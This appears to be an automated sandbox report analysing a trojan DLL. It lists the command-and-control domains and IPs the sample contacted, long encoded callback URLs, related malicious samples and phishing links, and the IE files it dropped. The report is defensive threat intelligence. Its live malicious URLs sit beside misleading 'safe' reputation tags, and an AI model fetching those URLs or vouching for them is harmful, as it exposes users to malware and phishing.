http://begoventa.top/images/FYBARzKsgpw7r/GeKZtzzc/xoDGsIA1G8WlOKnsrCv_2F5/ejqDaRsnD5/ZD4RH6oQdxqfB9	0%	Avira URL Cloud	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://begoventa.top/favicon.ico	0%	Avira URL Cloud	safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	0%	URL Reputation	safe
https://sectigo.com/CPS0D	0%	URL Reputation	safe
https://sectigo.com/CPS0D	0%	URL Reputation	safe
https://sectigo.com/CPS0D	0%	URL Reputation	safe
http://www.wikipedia.com/	0%	URL Reputation	safe
http://www.wikipedia.com/	0%	URL Reputation	safe
http://www.wikipedia.com/	0%	URL Reputation	safe
http://begoventa.top/images/FYBARzKsgpw7r/GeKZtzzc/xoDGsIA1G8WlOKnsrCv_2F5/ejqDaRsnD5/ZD4RH6oQd	0%	Avira URL Cloud	safe
http://begoventa.top/images/FYBARzKsgpw7r/GeKZtzzc/xoDGsIA1G8WlOKnsrCv_2F5/ejqDaRsnD5/ZD4RH6oQdxqfB9mxw/6WnzZpVL425M/CKmLBjBrvSn/f81OVwTXuZJrQZ/ja96eHVtqviz347i3JPx7/5Q6Nnj7RuUGPOFSU/4_2BMMGnBKrRLtO/P_2FyE_2BfezXukLEe/1gUCCjKEM/NO_2BQ8BNJkX/Zge.avi	0%	Avira URL Cloud	safe
http://babidone.top/images/tA_2BVY2gpEVQoau7_/2F_2Fif0j/qHSdUWFKPJWkX50svEcy/JM_2Bha3oNIg2DGHFKu/s3R	0%	Avira URL Cloud	safe
https://babidone.top/images/SD1b2IxKgGl/yu82lOMR21XtBT/D978a7t2zaVGKWj8Jhn4X/WcqZuBMBlmeeUEpv/9Sv89p	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
begoventa.top	47.91.89.242	true	false	2%, Virustotal, Browse	unknown
babidone.top	193.56.255.166	true	false	2%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://begoventa.top/favicon.ico	false	Avira URL Cloud: safe	unknown
http://begoventa.top/images/FYBARzKsgpw7r/GeKZtzzc/xoDGsIA1G8WlOKnsrCv_2F5/ejqDaRsnD5/ZD4RH6oQdxqfB9mxw/6WnzZpVL425M/CKmLBjBrvSn/f81OVwTXuZJrQZ/ja96eHVtqviz347i3JPx7/5Q6Nnj7RuUGPOFSU/4_2BMMGnBKrRLtO/P_2FyE_2BfezXukLEe/1gUCCjKEM/NO_2BQ8BNJkX/Zge.avi	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	zQ32b1FVcL.dll	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.nytimes.com/	msapplication.xml3.16.dr	false		high
http://begoventa.top/images/FYBARzKsgpw7r/GeKZtzzc/xoDGsIA1G8WlOKnsrCv_2F5/ejqDaRsnD5/ZD4RH6oQdxqfB9	{B10F0CC6-5544-11EB-90E4-ECF4BB862DED}.dat.34.dr	false	Avira URL Cloud: safe	unknown
http://ocsp.sectigo.com0	zQ32b1FVcL.dll	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	zQ32b1FVcL.dll	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.youtube.com/	msapplication.xml7.16.dr	false		high
https://sectigo.com/CPS0D	zQ32b1FVcL.dll	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.wikipedia.com/	msapplication.xml6.16.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.amazon.com/	msapplication.xml.16.dr	false		high
http://www.live.com/	msapplication.xml2.16.dr	false		high
http://begoventa.top/images/FYBARzKsgpw7r/GeKZtzzc/xoDGsIA1G8WlOKnsrCv_2F5/ejqDaRsnD5/ZD4RH6oQd	loaddll32.exe, 00000001.00000002.590862827.0000000001260000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://babidone.top/images/tA_2BVY2gpEVQoau7_/2F_2Fif0j/qHSdUWFKPJWkX50svEcy/JM_2Bha3oNIg2DGHFKu/s3R	{8CB598BC-5544-11EB-90E4-ECF4BB862DED}.dat.24.dr	false	Avira URL Cloud: safe	unknown
http://www.reddit.com/	msapplication.xml4.16.dr	false		high
http://www.twitter.com/	msapplication.xml5.16.dr	false		high
https://babidone.top/images/SD1b2IxKgGl/yu82lOMR21XtBT/D978a7t2zaVGKWj8Jhn4X/WcqZuBMBlmeeUEpv/9Sv89p	loaddll32.exe, 00000001.00000002.589354244.000000000050B000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
193.56.255.166	unknown	Romania		213137	INFOCLOUD-SRLMD	false
47.91.89.242	unknown	United States		45102	CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	338663
Start date:	12.01.2021
Start time:	18:08:32
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 35s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	zQ32b1FVcL.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	40
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal64.troj.winDLL@13/44@4/3
EGA Information:	Failed
HDC Information:	Successful, ratio: 44.9% (good quality ratio 43.6%) Quality average: 81.3% Quality standard deviation: 26.6%
HCA Information:	Successful, ratio: 81% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .dll
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, ielowutil.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, UsoClient.exe Excluded IPs from analysis (whitelisted): 104.42.151.234, 168.61.161.212, 40.88.32.150, 104.79.90.110, 51.104.139.180, 92.122.213.247, 92.122.213.194, 88.221.62.148, 67.27.157.254, 8.248.139.254, 67.26.139.254, 8.248.115.254, 8.248.131.254, 20.54.26.129, 152.199.19.161, 52.155.217.156 Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, go.microsoft.com, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, auto.au.download.windowsupdate.com.c.footprint.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, fs.microsoft.com, ie9comview.vo.msecnd.net, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, updates.microsoft.com, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, go.microsoft.com.edgekey.net, skypedataprdcolwus16.cloudapp.net, cs9.wpc.v0cdn.net Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
193.56.255.166	OgQJzDbLce.dll	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
begoventa.top	OgQJzDbLce.dll	Get hash	malicious	Browse	92.38.132.181
babidone.top	OgQJzDbLce.dll	Get hash	malicious	Browse	193.56.255.166

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	https://bit.ly/35cYpiT	Get hash	malicious	Browse	47.91.86.26
	https://ozmmdmfly0ob6rsgyfcjja-on.drv.tw/GAlAFw&flowName=GlifWebSignIn&flowEntry=AddSession&response_mode=form_post&response_type=code+id_token&scope=openid+profile&state=OpenIdConnect.AuthenticationProperties=7I5fOQe2aVADfQrM2gnSPpnNXdJDFVEswOkTEzvRpizt0MxezF-fEHwkij9KPoULqpUnkx2n_0Dud0uKVG57peviUxksCdnZyX7ab0n1hx9UpfkPdjMq2wNzHOC_K3ig&nonce=636810071538546755.OTdjZTIwMDItYjU4Yy00ODAxLTkzMDgtMzAzNGIwNThmY2ZkZWI3OTkzNDUtN2NlZC00MDIxLWFlZDQtNzhkNmM0ODhmMzAz&/	Get hash	malicious	Browse	47.89.250.243
	info.doc	Get hash	malicious	Browse	149.129.52.21
	https://bit.ly/3ba3hZS	Get hash	malicious	Browse	47.91.86.26
	https://bit.ly/3aA3uVV	Get hash	malicious	Browse	8.208.92.142
	SHIPPING INVOICEpdf.exe	Get hash	malicious	Browse	47.88.84.51
	factura_e_2903.vbs	Get hash	malicious	Browse	47.254.94.1
	http://chacagrabsterston.top	Get hash	malicious	Browse	8.209.77.50
	SecuriteInfo.com.Trojan.GenericKD.35624799.30696.exe	Get hash	malicious	Browse	47.57.139.0
	sULC8E4jwy.exe	Get hash	malicious	Browse	47.91.78.102
	https://bit.ly/3mH4Noj	Get hash	malicious	Browse	8.208.92.142
	https://bitly.com/2KZhv4G	Get hash	malicious	Browse	47.254.18.11
	https://bit.ly/2L1Yyyv	Get hash	malicious	Browse	8.208.92.142
	Fe8noCCZ5Z.exe	Get hash	malicious	Browse	47.91.95.232
	DualSpace.apk	Get hash	malicious	Browse	47.74.171.2
	http://p5fcw.info/HI12cu33F5	Get hash	malicious	Browse	47.242.44.124
	https://bit.ly/3pjmqfw	Get hash	malicious	Browse	8.208.92.142
	https://bit.ly/3mH4A4v	Get hash	malicious	Browse	8.208.92.142
	Order.doc	Get hash	malicious	Browse	47.74.93.57
	https://bit.ly/34CiZca	Get hash	malicious	Browse	8.208.92.142
INFOCLOUD-SRLMD	OgQJzDbLce.dll	Get hash	malicious	Browse	193.56.255.166
INFOCLOUD-SRLMD	5fd9d7ec9e7aetar.dll	Get hash	malicious	Browse	193.56.255.167

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{72A6A8A2-5544-11EB-90E4-ECF4BB862DED}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	29272
Entropy (8bit):	1.769384176506226
Encrypted:	false
SSDEEP:	48:IwnhGcprZ6GwpLfTG/ap8scrGIpcMGAGvnZpvMiGo3qp9MVGo4FpmMcMGWBXHGWB:rXZYZ72B9WMotM5fM+FMMybb+B
MD5:	3AE94EF99BB24395A544FEB78372A9B4
SHA1:	B9BF9F3EAA85022159E875171B7CBA7D78ABF7EA
SHA-256:	8D41CC000A6E5405F58CA7D9AE44A4553BE4ADE7FCDDDE419D1D6A64799D9615
SHA-512:	1FEB0E03DE945D281B980F502049B36D3113FE734395C312381402A3AB8386A4F8D1254F53627FC3D8D754F1161A5697FCE399E70A2CB309FA0E478F69DB8F4A
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{8CB598BA-5544-11EB-90E4-ECF4BB862DED}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	29272
Entropy (8bit):	1.7710312124199559
Encrypted:	false
SSDEEP:	48:IwlGcpr4GwpL2G/ap8RrGIpc5KGvnZpv5LGoVqp95TGo4Rpm5YGWfVpGW1T6p7GT:r7ZgZ02R9W53t54f5ERM5t163B
MD5:	29C4A3C89669918F62E835D432287FE6
SHA1:	8B7FDC121BBC6CB80E84CD628C5ABF77E78982A1
SHA-256:	9BD4CA23B69DEFECB872EB2112597A065EA4F4798349956856038B0FCA4CCF63
SHA-512:	7E9004133BC8A973CF8181DA45B8A65DF075F7A3162E31734F9D19DBF46BEC3C6178651AFFCD504C1B182E0C2BE3CF722AABADD8B585F2BD7031087A8DE7D8FE
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{A2FA2B65-5544-11EB-90E4-ECF4BB862DED}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	29272
Entropy (8bit):	1.7731704980611467
Encrypted:	false
SSDEEP:	48:IwpGcprThGwpLnIG/ap8ePrGIpcOxbGvnZpvOkNGotqp9OkVkGo4xpmOtcV0GW3e:rvZT7ZnC2eP9WOx8tOPfO6xMOIxLLB
MD5:	D0B87D1E0FB5C60B37D1EDDA7658A862
SHA1:	5B703AF3293216040C41C3030FFB66F9E0A45CD8
SHA-256:	7BC698F5CAAE1F21A6174F2B086160F073395E64E35407988957DDD8C64D48EE
SHA-512:	84FF9B9BA65749275AFA841992FC6A014737E511E5095E3F2D5B872AC6033683255D5DB29DA33D8ABA5701DEA0F48761F054A1406EFC6A2AA7E8F70044799FB5
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{B10F0CC4-5544-11EB-90E4-ECF4BB862DED}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	29272
Entropy (8bit):	1.7729096824956627
Encrypted:	false
SSDEEP:	48:Iw6GcprLGwpLaG/ap8FrGIpcmiGvnZpvmiGoYqp9mhGo4Bpmmw6aGWm2QGWUT6p0:r+ZFZA2F9WmPtmGfmSBMmtNMZzB
MD5:	29A3292D1A3B0638CB589518AC067AC9
SHA1:	EC81BACBCA78F545996995D9B2A02487A87EF087
SHA-256:	FBC81954483148ACF4ABFE5D92FF0A8324D00FEEBB2146C93BC71FF7A706AF08
SHA-512:	EBB9748BD2C8D9C9998C90EB2FB68F8175B69F04B55FC3A99E23B1CEF513EB89746A70E29EB195817465E1456217E199AA562742780F02810E76B5212E2DF183
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{72A6A8A4-5544-11EB-90E4-ECF4BB862DED}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27368
Entropy (8bit):	1.8431154863360353
Encrypted:	false
SSDEEP:	192:ryZxQP61kWFjV2YkWEMbYiFWNnxFWNS2iA:ruGC+WhMcxbHFWNxFWNS2V
MD5:	98EF5675ACFCE587633A4CA29F8A53B6
SHA1:	441CB4E3A543165E2C14C8D9569A967BBCFB7C1D
SHA-256:	13FBB6DC3F8B2C0A58E8D5AEE76011B9C061BF3BF6420F1F141C0DB98FDB71B3
SHA-512:	9D6A2FBDD2B0F407FD84C39B80B6FDCAFD22ABF3E02AA0342F8C11B10BE2DAF3A322F9699446931F67CC69F2D4B11016FA9D2B41348A392273534E186C1C466C
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{8CB598BC-5544-11EB-90E4-ECF4BB862DED}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27376
Entropy (8bit):	1.846090409968756
Encrypted:	false
SSDEEP:	48:IwfGcpryGwpaPG4pQ3GrapbSHrGQpBiGHHpcosTGUp8xGzYpm0xYGopo6LEVlMqm:r1Z6QB6LBSHFj52okW/MKY6pU3xpUu6A
MD5:	CA15393407EF61E6646343D4CF05980A
SHA1:	52729C1EFEACC636AB3151D2D5C3B6D42806A5BC
SHA-256:	014541CE1CE269C81F7F18CEA7922EDB3BD5FADA19BB0CADAC6F264B832218F1
SHA-512:	4FCA49FCC672C076083A441AC7069B8FC770FC75F1391872E987DB025DE8845135A1A7B208E4521EA4DAEFAF872DC6559FD5111BD32C83D1A1644261845DE020
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{A2FA2B67-5544-11EB-90E4-ECF4BB862DED}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27864
Entropy (8bit):	1.8245195311791338
Encrypted:	false
SSDEEP:	48:Iw3GcprSGwpaGG4pQSGrapbSjrGQpBCGHHpcgsTGUp8oGzYpmiuYGopQEltrzDGd:r9ZaQ26UBSjFjZ2gkWsMfYS+gR+Mr
MD5:	A1413466758220F73DEED46E91F9756A
SHA1:	5E19A3B8C6362C66E4CD56EB186F05C7A71CB3B8
SHA-256:	50A092C1980431F511B130979317818920BA9FA67691B7DC0A8823892F6B3119
SHA-512:	8464507EBCD7A671C7BAC35990202422BBA3EAC2B415B1F802961DFDABBC1D3BBB7593A559FBBC3B55C74F6C84D7C64DFE60F7C331E86F673C044BEAFE7725E9
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{B10F0CC6-5544-11EB-90E4-ECF4BB862DED}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27360
Entropy (8bit):	1.8405411493608728
Encrypted:	false
SSDEEP:	96:rrZQQ86KBSxFjxn2KkWCMIcYqEOYSREOYdzKA:rrZQQ86KkxFjxn2KkWCMIcYqEiRENzKA
MD5:	24F2A9DDEC3F9966E5B4E0D0553D0C9C
SHA1:	C12245E6657FDC26BE62E45312629459BE08BA14
SHA-256:	5A5D80B9ACB62503C5B17BD0EE1D164089DB55C31C652BC861FF6458495C21EE
SHA-512:	5217E67AF8E070387390C163758B17496825269001DDCA78B6C437A62F414B8205AEF08B3D8C054F07CCE51701BDD04E846B579A7D69B935C736F96AC760EBA4
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	656
Entropy (8bit):	5.100241569421958
Encrypted:	false
SSDEEP:	12:TMHdNMNxOEwW2UW2vnWimI002EtM3MHdNMNxOEwW2UW2vnWimI00ObVbkEtMb:2d6NxOMqcSZHKd6NxOMqcSZ76b
MD5:	2C436588E3D6DCF7FE89112328B3E730
SHA1:	4164F8038964A5A9384EF22402A93EDEE75EB21C
SHA-256:	08D1B15B701CD6919F93D0E26C9B501DF224789204A85F1CD22B65F72DBFDA8D
SHA-512:	B6F212B2B49C1F59232B5523440C5B3F1F73301188BD4D8CA6C758392A313018F77F595F7A3BBEE908ACC83A4A8D80AB5836930083469D8D96C730C6B0747824
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x48330f3c,0x01d6e951</date><accdate>0x48330f3c,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x48330f3c,0x01d6e951</date><accdate>0x48330f3c,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	653
Entropy (8bit):	5.173699561853213
Encrypted:	false
SSDEEP:	12:TMHdNMNxe2kwc0cPnWimI002EtM3MHdNMNxe2kwc0a4nWimI00Obkak6EtMb:2d6Nxr2SZHKd6Nxro4SZ7Aa7b
MD5:	18108C1538C400F573ED71BF12A57228
SHA1:	D3AD68F727F86A97FF01D69CD0CD824999B74D32
SHA-256:	DF85CE99B84855741812B93F31942C9766FED19D528FC98BE950AA91997D8F45
SHA-512:	0B350664E7C4472F54F452A290F005ED1302A9CE7D3DD226553A2342EA83D770F2A39DFFE95827C6D8448770A27992E3042F97452EE8CE1976FF18CC57B9CB8D
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x48298613,0x01d6e951</date><accdate>0x48298613,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x48298613,0x01d6e951</date><accdate>0x482be878,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	662
Entropy (8bit):	5.135413702811249
Encrypted:	false
SSDEEP:	12:TMHdNMNxvLwWYZWYanWimI002EtM3MHdNMNxvLwWYZWYanWimI00ObmZEtMb:2d6Nxv3f/SZHKd6Nxv3f/SZ7mb
MD5:	647C1BD469F8A2E152BB8CDE9294BDA2
SHA1:	7CDC043A343B5654844743DE41430C34770684A8
SHA-256:	D77AEFB653210521D7EED77736BBCC9DD39B79D3C8B01C3864295CA529701696
SHA-512:	82345CF268E17184320BFDE399FAFB4D3FEAD5B141FCAB2E8E45C458D7915199CDDEB19EF25F414C908221F7B76CDB4F0221C60C5CB05D418B7F0E9C4C9C2C91
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x483571cf,0x01d6e951</date><accdate>0x483571cf,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x483571cf,0x01d6e951</date><accdate>0x483571cf,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	647
Entropy (8bit):	5.112516029119953
Encrypted:	false
SSDEEP:	12:TMHdNMNxiwWubmWubpnWimI002EtM3MHdNMNxiwWubmWubpnWimI00Obd5EtMb:2d6NxSuISZHKd6NxSuISZ7Jjb
MD5:	CE75127F3FE5FF1F42A6465CB5948887
SHA1:	B750B0E975B083CE241678BC85ABE0C1AFBF057E
SHA-256:	C9A450FD56CB3D9039BF84EF161F5D8BD91307396AA7C530666AF811145847C1
SHA-512:	013AEF41A65E85B923BF9D1CCF8BF373191E1DA9F527B346FAC0A6DB97DB37127E13DB3314621CD4B0610582B03CD9372CB7492A93B16C6E18F780DF8B6BDA5E
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x4830ad7a,0x01d6e951</date><accdate>0x4830ad7a,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x4830ad7a,0x01d6e951</date><accdate>0x4830ad7a,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	656
Entropy (8bit):	5.154826181095927
Encrypted:	false
SSDEEP:	12:TMHdNMNxhGwwWYZWYanWimI002EtM3MHdNMNxhGwwWYZWyNanWimI00Ob8K075Es:2d6NxQof/SZHKd6NxQofyNaSZ7YKajb
MD5:	9C0ED05861F4BEABF0296BCF3CB7A3FC
SHA1:	AB9D6DCB20A34A858CBB692AFFE2B2DF14576B80
SHA-256:	EFCFC15BFFB9677764C6DB26CC1E63341E8C816BEA1C8AD394CCFC21566AE0AC
SHA-512:	AA587BC104BCC412DA3E042243F4FBF8044B0E41821C19491BE48AEAF9132C271E7FC4584677AD3C6807DFC7E63C4993668E191884A551A5D2D5683B6D486489
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x483571cf,0x01d6e951</date><accdate>0x483571cf,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x483571cf,0x01d6e951</date><accdate>0x4837d4a4,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	653
Entropy (8bit):	5.103439486630095
Encrypted:	false
SSDEEP:	12:TMHdNMNx0nwW2UW2vnWimI002EtM3MHdNMNx0nwW2UW2vnWimI00ObxEtMb:2d6Nx0jqcSZHKd6Nx0jqcSZ7nb
MD5:	ADA9C3D86BF31E7FFB632FBD5C1472EA
SHA1:	2F2649ADCE55986DFE8BB4214AFB2877C6D6E87D
SHA-256:	6CC12B67772FA86AE2203F8D133A7461C812F249ED494BF88AB9DA63F880648B
SHA-512:	1B765EBA71145EDB3B31569A4208AC3922E7DC484D006564BD6A11D2935DF2805967AE9A72A4FFC9AEFE693ED2BDDA6E08AF2D8C4F9632AAC7DF8343C620BB18
Malicious:	false
